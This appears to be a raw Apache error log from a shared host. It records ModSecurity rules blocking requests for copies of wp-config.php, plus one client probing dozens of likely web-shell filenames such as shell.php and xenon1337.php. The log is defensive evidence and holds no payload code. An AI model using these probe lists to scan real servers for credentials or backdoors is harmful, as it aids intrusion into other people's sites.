[Mon May 11 17:21:19.374413 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHz7vy_GXSWIKeli0sHQQAAAI4"]
[Mon May 11 17:21:19.765304 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/backup.wp-config.php"] [unique_id "agHz7w-Qm4vhlWBPlMjMkgAAABA"]
[Mon May 11 17:21:19.765439 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/backup.wp-config.php"] [unique_id "agHz7w-Qm4vhlWBPlMjMkgAAABA"]
[Mon May 11 17:21:20.633212 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHz7w-Qm4vhlWBPlMjMkgAAABA"]
[Mon May 11 17:21:27.269521 2026] [autoindex:error] [pid 1411201:tid 1411263] [client 54.226.111.149:52100] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:21:30.631906 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.655758 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.679591 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.703303 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.727068 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.751045 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.774734 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.798671 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.822449 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.846866 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.870701 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.894662 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.918580 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.942545 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.966487 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:30.990316 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.038777 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.062980 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.086868 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.111721 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.137332 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.160910 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.184679 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:31.210929 2026] [proxy_fcgi:error] [pid 1411201:tid 1411269] [client 40.69.66.178:13394] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:21:52.008195 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/0x.php
[Mon May 11 17:21:52.291244 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/xenon1337.php
[Mon May 11 17:21:52.612551 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/mac.php
[Mon May 11 17:21:52.863390 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/hayuk.php
[Mon May 11 17:21:53.468219 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/0d.php
[Mon May 11 17:21:53.762646 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wefile.php
[Mon May 11 17:21:54.157010 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/casp3.php
[Mon May 11 17:21:54.422562 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/birlingsless.php
[Mon May 11 17:21:54.913723 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/unvouc.php
[Mon May 11 17:21:55.230557 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-signin.php
[Mon May 11 17:21:56.216349 2026] [autoindex:error] [pid 1416109:tid 1416149] [client 194.163.172.80:61767] AH01276: Cannot serve directory /home/ventespr/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 17:21:56.364983 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-links.php
[Mon May 11 17:21:57.478825 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/half.php
[Mon May 11 17:21:57.732426 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/2P.php
[Mon May 11 17:21:58.004486 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/tires.php
[Mon May 11 17:21:58.387815 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/aevly.php
[Mon May 11 17:21:59.047025 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-block.php
[Mon May 11 17:21:59.299039 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/like.php
[Mon May 11 17:21:59.616177 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/kj.php
[Mon May 11 17:22:00.085909 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/.well-known/about.php
[Mon May 11 17:22:00.635669 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wpxml.php
[Mon May 11 17:22:00.936039 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/bob.php
[Mon May 11 17:22:01.192302 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/spawns.php
[Mon May 11 17:22:01.467464 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/t3s.php
[Mon May 11 17:22:02.848594 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/uwu.php
[Mon May 11 17:22:03.113936 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/uwa.php
[Mon May 11 17:22:03.398151 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/crgio.php
[Mon May 11 17:22:03.640138 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/geforce.php
[Mon May 11 17:22:03.897221 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-load.php
[Mon May 11 17:22:04.162525 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/3PJcpMFsD8B.php
[Mon May 11 17:22:04.405891 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/.sghb.php
[Mon May 11 17:22:04.662246 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/zoko.php
[Mon May 11 17:22:04.907258 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/bgymj.php
[Mon May 11 17:22:05.153652 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/pucci.php
[Mon May 11 17:22:06.502128 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/one.php
[Mon May 11 17:22:06.808423 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/sl.php
[Mon May 11 17:22:07.085280 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-temp.php
[Mon May 11 17:22:07.696146 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/xmu.php
[Mon May 11 17:22:07.953634 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/mode.php
[Mon May 11 17:22:08.472916 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 17:22:08.754606 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/puc.php
[Mon May 11 17:22:09.005846 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/themes.php
[Mon May 11 17:22:09.315094 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 17:22:09.569297 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/awa.php
[Mon May 11 17:22:09.637612 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/new-wp-config.php"] [unique_id "agH0Ify_GXSWIKeli0sIIgAAAI4"]
[Mon May 11 17:22:09.637713 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/new-wp-config.php"] [unique_id "agH0Ify_GXSWIKeli0sIIgAAAI4"]
[Mon May 11 17:22:09.825331 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/11.php
[Mon May 11 17:22:10.086589 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/p.php
[Mon May 11 17:22:10.402757 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agH0Ify_GXSWIKeli0sIIgAAAI4"]
[Mon May 11 17:22:10.520169 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/new-wp-config.php"] [unique_id "agH0Ig-Qm4vhlWBPlMjNIgAAABA"]
[Mon May 11 17:22:10.520333 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/new-wp-config.php"] [unique_id "agH0Ig-Qm4vhlWBPlMjNIgAAABA"]
[Mon May 11 17:22:10.587425 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/bthil.php
[Mon May 11 17:22:10.829693 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/shell.php
[Mon May 11 17:22:11.090746 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/seo.php
[Mon May 11 17:22:11.583792 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/7.php
[Mon May 11 17:22:11.680373 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agH0Ig-Qm4vhlWBPlMjNIgAAABA"]
[Mon May 11 17:22:11.834517 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/8.php
[Mon May 11 17:22:12.076507 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/1.php
[Mon May 11 17:22:12.324427 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/class.php
[Mon May 11 17:22:12.585914 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/100.php
[Mon May 11 17:22:12.975362 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/2026w.php
[Mon May 11 17:22:13.234666 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/about.php
[Mon May 11 17:22:13.482445 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/xa.php
[Mon May 11 17:22:13.739898 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 17:22:14.000902 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/w2025.php
[Mon May 11 17:22:14.302108 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/fvvff.php
[Mon May 11 17:22:14.548807 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/edit.php
[Mon May 11 17:22:14.813642 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 17:22:15.315873 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/f6.php
[Mon May 11 17:22:15.578303 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/inputs.php
[Mon May 11 17:22:15.821863 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 17:22:16.339707 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-act.php
[Mon May 11 17:22:16.597169 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/classwithtostring.php
[Mon May 11 17:22:17.106493 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp-blog.php
[Mon May 11 17:22:17.857402 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/adminfuns.php
[Mon May 11 17:22:18.101522 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 17:22:18.345090 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/ms-edit.php
[Mon May 11 17:22:18.625700 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/222.php
[Mon May 11 17:22:19.393503 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/BDKR28WP.php
[Mon May 11 17:22:20.182822 2026] [:error] [pid 1411201:tid 1411246] [client 20.9.31.235:20644] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 17:22:21.301279 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 17:22:21.581205 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 17:22:21.858548 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 17:22:22.649937 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/f35.php
[Mon May 11 17:22:23.185192 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/bal.php
[Mon May 11 17:22:24.001901 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 17:22:24.794202 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 17:22:25.062785 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/buy.php
[Mon May 11 17:22:25.348010 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/xxx.php
[Mon May 11 17:22:25.619340 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/hypo.php
[Mon May 11 17:22:26.152407 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/chosen.php
[Mon May 11 17:22:26.738703 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/00.php
[Mon May 11 17:22:27.011024 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/als.php
[Mon May 11 17:22:27.282323 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/pol.php
[Mon May 11 17:22:27.540832 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/ms-amdin.php
[Mon May 11 17:22:27.794106 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/mini-type0.php
[Mon May 11 17:22:28.046035 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/bypasbnget.php
[Mon May 11 17:22:28.306065 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/sf.php
[Mon May 11 17:22:28.577040 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/file5.php
[Mon May 11 17:22:28.863169 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/fs.php
[Mon May 11 17:22:29.132917 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/4PJcpMFsD8B.php
[Mon May 11 17:22:29.386229 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 17:22:29.702664 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/class.1.php
[Mon May 11 17:22:29.974750 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/wp-gr.php
[Mon May 11 17:22:30.238990 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/cfile.php
[Mon May 11 17:22:30.495254 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/class-wp.php
[Mon May 11 17:22:30.761829 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/ff2.php
[Mon May 11 17:22:31.051655 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/aa2.php
[Mon May 11 17:22:31.322596 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/133.php
[Mon May 11 17:22:31.608905 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/ccou.php
[Mon May 11 17:22:31.878076 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/login8.php
[Mon May 11 17:22:32.149810 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/3586 b64.php
[Mon May 11 17:22:32.411294 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/18299.php
[Mon May 11 17:22:32.673778 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/nx1.php
[Mon May 11 17:22:32.978554 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/Noname6.php
[Mon May 11 17:22:33.231450 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/tia.php
[Mon May 11 17:22:33.502015 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/coa.php
[Mon May 11 17:22:33.769936 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/dr.php
[Mon May 11 17:22:34.049721 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/let.php
[Mon May 11 17:22:34.316862 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/w12.php
[Mon May 11 17:22:34.587414 2026] [:error] [pid 1411099:tid 1411118] [client 20.9.31.235:20658] File does not exist: /home/manhatta/public_html/chati.php
